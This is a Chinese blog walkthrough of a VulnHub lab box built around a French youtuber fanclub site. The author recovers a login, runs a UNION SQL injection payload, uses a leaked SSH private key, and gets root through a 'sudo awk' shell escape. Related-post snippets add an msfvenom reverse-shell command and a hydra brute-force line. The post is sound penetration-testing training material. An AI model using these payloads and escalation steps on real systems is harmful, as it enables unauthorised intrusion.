vuluhub

最新推荐文章于 2024-05-13 18:44:59 发布
最新推荐文章于 2024-05-13 18:44:59 发布
阅读量1.1k 收藏
点赞数 1
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/avasy/article/details/86947844
版权

Description : Two french people want to start the very first fanclub of the youtuber Khaos Farbauti Ibn Oblivion. But they're not very security aware !
(IMPORTANT NOTE : The whole challenge is in french, including server conf. Which may add to the difficulty if you are non-native or using a non-azerty keyboard)Difficulty : Beginner with some little non-usual twistsFlag : There are four flags to find, not all of them on the solution path

法语的靶机,对我这个没学过法语的人是一个不小的难题,尽管是新手难度(捂脸)

但还是要开始的。
首先,nmap扫描一波,来收集一下关于目标的相关信息

从扫描的信息可以得出以下几点,
目标开放两个端口(22,80)
运行的系统是linux系统

因此我先用浏览器访问一下80端口

浏览器打开目标网页后,它要求输入用户名和密码才能登陆,但是我不知道啊,但是这个网页里面还有另外一条有价值的信息
该网站称48.08333-0.95
看起来像一个坐标

没有密码就按取消,结果给我跳转了这个页面,

看不懂法语,求助百度翻译

看来那个Bob可以当成用户名

我搜了一下,百度上搜不到,只好用谷歌地图,

我们成功用这个地名登录了
因此用户名为Bob
密码为:
LaBrûlatte

我访问一下robots.txt ,很幸运地找到第一个flag

回到刚才一访问的第一个网页

我推测这个alice 和Bob应该都是用户名,因为Bob刚才确认已经是用户名了



这显然是一个粉丝为自己的偶像设置的网站,我点了一下,前面几个欢迎,档案都没有什么有用的信息,重要的东西都在Khaosearch这个连接


点开那些连接,是一个叫Khao的人的yotube频道,应该是这个靶机的作者


还有他的直播

不浪费时间了,在他的搜索框里尝试一下sql注入验证

返回的结果什么也没有

raj" union select table_name, column_name from information_schema.columns;#

我通过注入下面这条指令找到另外一个连接关于alice的

右键查看一下该网页的源代码,因为这个链接与ssh_key有关
打开一看,发现好东西了

马上将它粘贴到一个文档文件里面,命名为id_rsa

然后将它的权限提高
chmod 600 id_rsa

然后用ssh连接靶机,账号alice,密码用id_rsa
ssh alice@192.168.0.106 -i id_rsa
连上了,复制粘贴的时候一定要把begin private key和end private key都要粘上

成功获取flag3.txt

这里的意思是说,alice用户可以通过以下这种方式不用输入root用户的密码就可以执行root权限

sudo awk 'BEGIN {system("/bin/bash")}'
ls
cat flag4.txt

完成了

avasy
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vuluhub靶场-breach1
ad12456的博客
05-03 1642
网络设置和准备: 该靶场的ip:192.168.110.140 ,我们要设置为仅主机模式。在虚拟机中将仅主机模式的ip地址范围包含靶机的ip。除了网络设置,还要准备两台kali。一台连接外网,一台和靶机一样要仅主机模式。 信息收集 Nmap扫描 启动靶机,启动kali攻击机。现在了解的信息就一个:IP。首先用nmap扫描端口,看看开启了什么服务。 namp -T4 -A -v 192.168.110.140 发现端口大量的开放,推测应该是安装了蜜罐之类的防护。那我们用最常用的服务端口:80 试一试看
vuInhub靶场实战系列-DC-5实战
最新发布
weixin_45221204的博客
05-26 1251
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文将介绍dc-5靶机渗透测试,内容包括 nmap扫描、dirsearch目录扫描、文件包含、Burp Suite密码爆破、netcat反弹shell、rpcbind漏洞利用、GNU Screen漏洞利用、sudo提权等内容。
[vuluhub]-(GoldenEye)
weixin_47920370的博客
08-25 1073
我们在国外漏洞库搜索的时候,发现他要是用PSpellShell,经过仔细寻找,然后我们在Site administration ->Advanced features -> Plugins->Text editors->TinyMCE HTML editor。hydra -L wangkun.txt -P /usr/share/wordlists/fasttrack.txt 192.168.159.154 -s 55007 pop3 --用九头蛇对pop3进行爆破。用邮件里面的用户名和密码进行登陆一下。..
漏洞靶场实战-Vuluhub medium_socnet
Love&Share
05-06 2085
文章目录下载安装配置 VB 和 VM 的网络链接实战1.主机发现2.第一台主机漏洞利用拿shell方法一:NC监听方法二:MSF shell横向移动**方法一:MSF方法二:工具代理3.第二台主机漏洞利用漏洞发现漏洞利用 下载安装 Vulnhub 是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地 VM 打开即可,但是很多靶场不兼容 Vmware 比如本次用的靶场就不兼容,所以推荐 VirtualBox 本次复现靶场下载地址 下载的是一个 ovf 后缀的文件,打开 VirtualBox,导.
vuluhub-skytower-1渗透靶场SkyTower 1
ccccai22的博客
08-04 221
vuluhub-skytower-1渗透靶场SkyTower 1提权
raven靶机实战(linux-udf提权)-vuluhub系列(四)
PANDA墨森的博客
06-28 954
这是vulnhub靶机系列文章的第四篇,本次的靶机感觉还是挺有趣的,学到的重要知识点为linux下-mysql的udf提权以及某cms的漏洞getshell,开始吧... 靶机下载链接:https://download.vulnhub.com/raven/Raven2.ova 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13189038.html #001 环境搭建(nat) 攻击机kali:192.168.136.129 靶机Raven2:192.168.
漏洞靶场实战-Vuluhub DC-1
Love&Share
05-06 674
文章目录下载安装DC-1利用1.主机发现2.Drupal漏洞利用flag1flag2flag3flag4flag5流程梳理附录Nmap 常用参数 下载安装 Vulnhub 是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地 VM 打开即可 本次复现靶场下载地址 下载的是一个 ovf 后缀的文件,打开 Vmware,导入 导入完毕后根据需求编辑虚拟机设置,开机即可 这样就是正常的,不需要登录 Kali IP:192.168.179.144 DC-1 利用 1.主机发现 arp-scan -.
vuluhub-darkhole2 打靶记录
lcc001114的博客
06-14 186
系列DarkHole(此系列共2台)发布日期:2021年9月3日提示:不要浪费时间进行暴力破解;使用Vmware虚拟机难度:中目标:取得 root 权限 + 2 Flag主机发现端口扫描信息收集Git 库泄漏SQL注入本地端口转发本地信息收集密码爆破水平提权Root提权1、2。
红队靶场复现之w1r3s-vuluhub靶场复现
m0_58116751的博客
05-13 807
用kali自带插件实现cms文件包含的漏洞复现
vuluhub靶场实战之breach1.0
wangyanjienice的博客
12-12 1199
环境 kali(攻击):192.168.110.128 breach(靶机):192.168.110.140 0x01 主机发现 netdiscover -i eth0 -r 192.168.110.0/24 Currently scanning: Finished! | Screen View: Unique Hosts
另一种方法
avasy的博客
02-03 3960
上一次 拿到tomcat用户名和密码后,可以从tomcat入手,在管理页登录 这里显示能上传一个.war文件,我用msfvenom生成一个war的后门 msfvenom -p windows/x64/shell_reverse_tcp -f LHOST=192.168.0.108 LPORT=4545 payload.war 这次不用metasploit,改用netcat侦听4545端口...
metasploitable3 第一个flag, King of Diamond
avasy的博客
02-01 2942
nmap扫描对应的端口 192.168.0.105 8585 tcp http open Apache httpd 2.2.21 (Win64) PHP/5.3.10 用浏览器访问一下 打开后网页的下方有一个phpinfo和phpadmin,这时候可以点进去看一下,看相关的信息 从phpinfo中我们得到以下有关靶机的信息 靶机系统版本: Windows NT METASPLOITABLE3 6....
metasploitable3 靶机介绍与相关信息搜集
avasy的博客
02-01 2853
metasploitable3:虚拟靶机 发布于2016年11月,含有15个flag文件,每个flag文件都是扑克指牌 所需系统要求: System Requirements: OS capable of running all of the required applications listed below VT-x/AMD-V Supported Processor recommende...
Kali镜像源同步问题
avasy的博客
02-19 2237
Kali的源,网络,犹如六月的天,犹如孩子的脸,说变就变,说出问题就出问题,急转弯快的你猝不及防。这不今天又给我搞一出 文件尺寸不符(12812582 != 12813041)。您使用的镜像正在同步中?   具体的图我没截,但可以看出又是源出问题。 什么?你叫我百度一下解决?嗯,得出的是这种结果, 所以说搜技术上的问题,我很少用百度 果断谷歌搜了一波 我是参照这位大佬的博客改的,...
Metasploitable3-Six of Diamonds 第三个flag
avasy的博客
02-02 1674
在上次渗透中,我发现靶机对应的8585端口里面存在一个upload目录,这让我想到靶机可能存在文件上传漏洞,尝试上传一个菜刀马。 我用到了kali的工具cadaver 在上传php文件前,我首先上传一个txt文件验证一下 先在kali内新建一个txt文件 保存后上传 上传成功,打开浏览器验证 用gedit新建一个chopper.php文件,用cadver上传 上传成功 然后用菜刀连接 我...
Metasploitable3-Joker 第七个flag
avasy的博客
02-02 1303
  这一次,我要捉一个小丑,joker 通过前期nmap的信息搜集,靶机开放的 161端口 snmp(public) 80端口 http 既然开着snmp服务,就先来一波snmp检测 在kali下有两个工具可以完成snmp检测, 一个是snmp-check,另外一个是msf下的 msf>use auxiliary/scanner/snmp/snmp_enum模块 首先我方派出的是snmp...
Metasploitable3-King of Hearts 第二个flag
avasy的博客
02-01 1280
在抓捕第一个方块K的过程中,同时发现了第二个flag,红心K的踪迹,它与方块K在同一个木目录下下面,具体过程和前面第一个flag一样,略过不表 来到2016目录,点进去,再从09目录点进去 来到熟悉的目录下面 king of heart和上一个flag不同的地方在于,它的文件名并没有明明白白地写着king of hearts,而是写成metasploitable3_flag,在metaspl...
Metasploitable3-Seven of Spades 第六个flag
avasy的博客
02-02 993
  经过信息搜集,我发现靶机开放22端口 所以还是使用ssh爆破,这一次用xhydra,xhydra是hydra的图形化界面 在终端上输入xhydra,设置好相关参数 点一下Passwords菜单,设置好相关字典 在Tuning设置相关进程 开始爆破,得出7个可用账户密码 任选一个用户登录 进入靶机,找到public目录,经过寻找,最终在Documents目录下找到seven_of_spa...
Metasploitable3-Ace of Hearts 第八个flag
avasy的博客
02-03 989
这是第八个flag. 结合之前的信息搜集,我们打开nessus的扫描报告 CVE-2015-8249 ZOHOManageEngineDesktopCentral(DC)是美国卓豪(ZOHO)公司的一套桌面管理解决方案。该方案包含软件分发、补丁管理、系统配置、远程控制等功能模块,可对桌面机以及服务器管理的整个生命周期提供支持。ZOHOManageEngineDC9版本中的FileUploadSe...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值